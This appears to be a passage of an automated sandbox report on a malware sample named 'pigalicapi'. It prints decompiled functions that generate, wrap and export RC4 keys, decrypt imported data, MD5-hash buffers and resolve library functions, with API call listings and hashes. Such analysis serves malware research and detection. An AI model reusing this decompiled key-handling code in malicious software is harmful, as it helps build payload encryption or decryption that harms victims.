                                                                                                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                                                                                                        				int _t42;
                                                                                                                                                                                                                                                                                                        				signed int _t43;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                        				int _t51;
                                                                                                                                                                                                                                                                                                        				char* _t71;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t41 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t42 == 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t71 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v28 = 0x80;
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                                                        						_t43 = _v24;
                                                                                                                                                                                                                                                                                                        						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                                                        						if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        							_t46 = _a4;
                                                                                                                                                                                                                                                                                                        							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                                                        							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                                        								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                                        									_v8 = 1;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v32 = 0;
                                                                                                                                                                                                                                                                                                        									if(CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32) != 0) {
                                                                                                                                                                                                                                                                                                        										_t51 = _v20;
                                                                                                                                                                                                                                                                                                        										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                        										_v8 = _t51;
                                                                                                                                                                                                                                                                                                        										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							CryptDestroyKey(_v20); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x024e8806
                                                                                                                                                                                                                                                                                                        0x024e8811
                                                                                                                                                                                                                                                                                                        0x024e895c
                                                                                                                                                                                                                                                                                                        0x024e8962
                                                                                                                                                                                                                                                                                                        0x024e8821
                                                                                                                                                                                                                                                                                                        0x024e8821
                                                                                                                                                                                                                                                                                                        0x024e8831
                                                                                                                                                                                                                                                                                                        0x024e883b
                                                                                                                                                                                                                                                                                                        0x024e8843
                                                                                                                                                                                                                                                                                                        0x024e884b
                                                                                                                                                                                                                                                                                                        0x024e8855
                                                                                                                                                                                                                                                                                                        0x024e8869
                                                                                                                                                                                                                                                                                                        0x024e8874
                                                                                                                                                                                                                                                                                                        0x024e8874
                                                                                                                                                                                                                                                                                                        0x024e8855
                                                                                                                                                                                                                                                                                                        0x024e887e
                                                                                                                                                                                                                                                                                                        0x024e8884
                                                                                                                                                                                                                                                                                                        0x024e888b
                                                                                                                                                                                                                                                                                                        0x024e889b
                                                                                                                                                                                                                                                                                                        0x024e88a2
                                                                                                                                                                                                                                                                                                        0x024e88af
                                                                                                                                                                                                                                                                                                        0x024e88b7
                                                                                                                                                                                                                                                                                                        0x024e88c1
                                                                                                                                                                                                                                                                                                        0x024e88cf
                                                                                                                                                                                                                                                                                                        0x024e88d7
                                                                                                                                                                                                                                                                                                        0x024e88dd
                                                                                                                                                                                                                                                                                                        0x024e893f
                                                                                                                                                                                                                                                                                                        0x024e88f1
                                                                                                                                                                                                                                                                                                        0x024e88f1
                                                                                                                                                                                                                                                                                                        0x024e8914
                                                                                                                                                                                                                                                                                                        0x024e8926
                                                                                                                                                                                                                                                                                                        0x024e892a
                                                                                                                                                                                                                                                                                                        0x024e8930
                                                                                                                                                                                                                                                                                                        0x024e8937
                                                                                                                                                                                                                                                                                                        0x024e8937
                                                                                                                                                                                                                                                                                                        0x024e893d
                                                                                                                                                                                                                                                                                                        0x024e88dd
                                                                                                                                                                                                                                                                                                        0x024e894a
                                                                                                                                                                                                                                                                                                        0x024e894a
                                                                                                                                                                                                                                                                                                        0x024e8956
                                                                                                                                                                                                                                                                                                        0x024e8956
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e887e

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,024E8420,00000000,00001000,00000000), ref: 024E883B
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E8845
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8874
                                                                                                                                                                                                                                                                                                        • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 024E88AF
                                                                                                                                                                                                                                                                                                        • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 024E88CF
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 024E890C
                                                                                                                                                                                                                                                                                                        • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 024E892A
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 024E8937
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E894A
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8956
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E882C
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8864
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: 959b0a563cac0751f0e993be2afc38545d5ec8bc1b3c41bcb088f4f6815a9f3a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4af3acabdcb6a2aa9640d859b1919fe1cca68e30b7b003622bb48a9274bb22ae
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 959b0a563cac0751f0e993be2afc38545d5ec8bc1b3c41bcb088f4f6815a9f3a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0410B71E40209EBFF18CFD4C889BAF7BB8BB44706F14851AF612AA290C7B59554CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                                                                                                                                                        			E024E8BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                                                                                                                        				char* _t36;
                                                                                                                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t36 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        						_t37 = GetLastError();
                                                                                                                                                                                                                                                                                                        						_v16 = _t37;
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t57 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                                        							_t39 = _a8;
                                                                                                                                                                                                                                                                                                        							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                                                        							if(_t39 != 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								_v28 = 4;
                                                                                                                                                                                                                                                                                                        								_t41 =  &_v28;
                                                                                                                                                                                                                                                                                                        								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                                                        								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                                                        									_v32 = _a16;
                                                                                                                                                                                                                                                                                                        									_t43 = _a12;
                                                                                                                                                                                                                                                                                                        									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                                                        									if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        										_v8 = _v32;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x024e8bb6
                                                                                                                                                                                                                                                                                                        0x024e8bc1
                                                                                                                                                                                                                                                                                                        0x024e8ce7
                                                                                                                                                                                                                                                                                                        0x024e8ced
                                                                                                                                                                                                                                                                                                        0x024e8be5
                                                                                                                                                                                                                                                                                                        0x024e8be5
                                                                                                                                                                                                                                                                                                        0x024e8bf5
                                                                                                                                                                                                                                                                                                        0x024e8bff
                                                                                                                                                                                                                                                                                                        0x024e8c07
                                                                                                                                                                                                                                                                                                        0x024e8c09
                                                                                                                                                                                                                                                                                                        0x024e8c0f
                                                                                                                                                                                                                                                                                                        0x024e8c19
                                                                                                                                                                                                                                                                                                        0x024e8c2d
                                                                                                                                                                                                                                                                                                        0x024e8c38
                                                                                                                                                                                                                                                                                                        0x024e8c38
                                                                                                                                                                                                                                                                                                        0x024e8c19
                                                                                                                                                                                                                                                                                                        0x024e8c42
                                                                                                                                                                                                                                                                                                        0x024e8c59
                                                                                                                                                                                                                                                                                                        0x024e8c61
                                                                                                                                                                                                                                                                                                        0x024e8c65
                                                                                                                                                                                                                                                                                                        0x024e8c71
                                                                                                                                                                                                                                                                                                        0x024e8c79
                                                                                                                                                                                                                                                                                                        0x024e8c7b
                                                                                                                                                                                                                                                                                                        0x024e8c82
                                                                                                                                                                                                                                                                                                        0x024e8c8b
                                                                                                                                                                                                                                                                                                        0x024e8c99
                                                                                                                                                                                                                                                                                                        0x024e8ca1
                                                                                                                                                                                                                                                                                                        0x024e8cae
                                                                                                                                                                                                                                                                                                        0x024e8cb7
                                                                                                                                                                                                                                                                                                        0x024e8cc1
                                                                                                                                                                                                                                                                                                        0x024e8cc9
                                                                                                                                                                                                                                                                                                        0x024e8cce
                                                                                                                                                                                                                                                                                                        0x024e8cce
                                                                                                                                                                                                                                                                                                        0x024e8cc9
                                                                                                                                                                                                                                                                                                        0x024e8ca1
                                                                                                                                                                                                                                                                                                        0x024e8cd5
                                                                                                                                                                                                                                                                                                        0x024e8cd5
                                                                                                                                                                                                                                                                                                        0x024e8ce1
                                                                                                                                                                                                                                                                                                        0x024e8ce1
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e8c42

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8BFF
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E8C09
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8C38
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8C59
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8C71
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 024E8C99
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 024E8CC1
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 024E8CD5
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8CE1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8C28
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8BF0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: f361ed95f99739ef65681ae652466b78c6ad665867ec966b0f3a33cfdba35e48
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2aa65fa08e364613209c105e16e464ff827232601c5e66feb643d5697d9b2056
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f361ed95f99739ef65681ae652466b78c6ad665867ec966b0f3a33cfdba35e48
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99413A71A41209EBEF24CFD4C989BEF77B8BB44706F10851AF602AA280C7B49940CF60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E8A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                                                                                                                                        				long* _v24;
                                                                                                                                                                                                                                                                                                        				char* _t35;
                                                                                                                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                                                                                                                        				int _t43;
                                                                                                                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                                        					L16:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t35 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t62 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                        							_v24 = 0;
                                                                                                                                                                                                                                                                                                        							_t43 = CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24); // executed
                                                                                                                                                                                                                                                                                                        							if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                                        								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x024e8a76
                                                                                                                                                                                                                                                                                                        0x024e8a81
                                                                                                                                                                                                                                                                                                        0x024e8ba3
                                                                                                                                                                                                                                                                                                        0x024e8ba9
                                                                                                                                                                                                                                                                                                        0x024e8ab9
                                                                                                                                                                                                                                                                                                        0x024e8ab9
                                                                                                                                                                                                                                                                                                        0x024e8ac9
                                                                                                                                                                                                                                                                                                        0x024e8ad3
                                                                                                                                                                                                                                                                                                        0x024e8adb
                                                                                                                                                                                                                                                                                                        0x024e8ae3
                                                                                                                                                                                                                                                                                                        0x024e8aed
                                                                                                                                                                                                                                                                                                        0x024e8b01
                                                                                                                                                                                                                                                                                                        0x024e8b0c
                                                                                                                                                                                                                                                                                                        0x024e8b0c
                                                                                                                                                                                                                                                                                                        0x024e8aed
                                                                                                                                                                                                                                                                                                        0x024e8b16
                                                                                                                                                                                                                                                                                                        0x024e8b1c
                                                                                                                                                                                                                                                                                                        0x024e8b37
                                                                                                                                                                                                                                                                                                        0x024e8b3f
                                                                                                                                                                                                                                                                                                        0x024e8b41
                                                                                                                                                                                                                                                                                                        0x024e8b5e
                                                                                                                                                                                                                                                                                                        0x024e8b66
                                                                                                                                                                                                                                                                                                        0x024e8b80
                                                                                                                                                                                                                                                                                                        0x024e8b87
                                                                                                                                                                                                                                                                                                        0x024e8b87
                                                                                                                                                                                                                                                                                                        0x024e8b91
                                                                                                                                                                                                                                                                                                        0x024e8b91
                                                                                                                                                                                                                                                                                                        0x024e8b9d
                                                                                                                                                                                                                                                                                                        0x024e8b9d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e8b16

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8AD3
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E8ADD
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8B0C
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 024E8B37
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8B5E
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8B7A
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B87
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B91
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8B9D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8AC4
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8AFC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: f0dd1404780b21a0aabb10c4edd250f8a3c4c3f4a047ea49f1e4b62f98cd7bde
                                                                                                                                                                                                                                                                                                        • Instruction ID: e17cad6e4296bf3cd396a653ee2ecb40244189e6f3968d5e4b05af6f1eaed21d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0dd1404780b21a0aabb10c4edd250f8a3c4c3f4a047ea49f1e4b62f98cd7bde
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB31FEB1A40209EFEF14CF94C889BEF77B8BB48705F14855AF511AA291C7B49650CF61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 1000104E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(000000C1), ref: 10001096
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                                                        • Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E48EB
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 024E490B
                                                                                                                                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E493C
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 024E496F
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E4982
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 024E49A9
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 024E49CC
